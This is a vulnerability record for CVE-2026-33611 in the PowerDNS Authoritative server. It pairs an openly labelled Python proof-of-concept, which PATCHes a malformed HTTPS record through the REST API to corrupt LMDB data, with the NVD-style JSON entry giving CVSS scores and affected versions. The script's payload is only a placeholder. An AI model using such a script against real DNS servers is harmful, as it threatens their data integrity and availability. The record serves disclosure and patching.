CVE-2026-33611

import requests import json # PowerDNS API endpoint url = "http://target-pdns:8081/api/v1/servers/localhost/zones/example.com" # Headers with API Key (High privileges required) headers = { "X-API-Key": "<REDACTED_API_KEY>", "Content-Type": "application/json" } # Malicious payload attempting to corrupt LMDB via invalid HTTPS record # Note: The exact payload depends on the specific validation bypass payload = { "rrsets": [{ "name": "example.com", "type": "HTTPS", "ttl": 3600, "records": [{ "content": "1 . alpn=\"h3\" malformed_payload=\"<inject_corrupt_data>\"", "disabled": False }] }] } try: response = requests.patch(url, headers=headers, data=json.dumps(payload)) if response.status_code == 204: print("[+] Potential payload sent successfully.") else: print(f"[-] Request failed: {response.status_code}") print(response.text) except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-33611", "sourceIdentifier": "[email protected]", "published": "2026-04-22T14:16:55.000", "lastModified": "2026-05-12T20:16:46.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An operator allowed to use the REST API can cause the Authoritative server to produce invalid HTTPS or SVCB record data, which can in turn cause LMDB database corruption, if using the LMDB backend."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:authoritative:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.9.0", "versionEndExcluding": "4.9.14", "matchCriteriaId": "08464BC2-733F-4260-878D-DE05919A7A7D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:authoritative:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.4", "matchCriteriaId": "A26C526E-15DC-41BE-9B66-FC6A63679562"}]}]}], "references": [{"url": "https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-05.html", "source": "[email protected]", "tags": ["Broken Link"]}]}}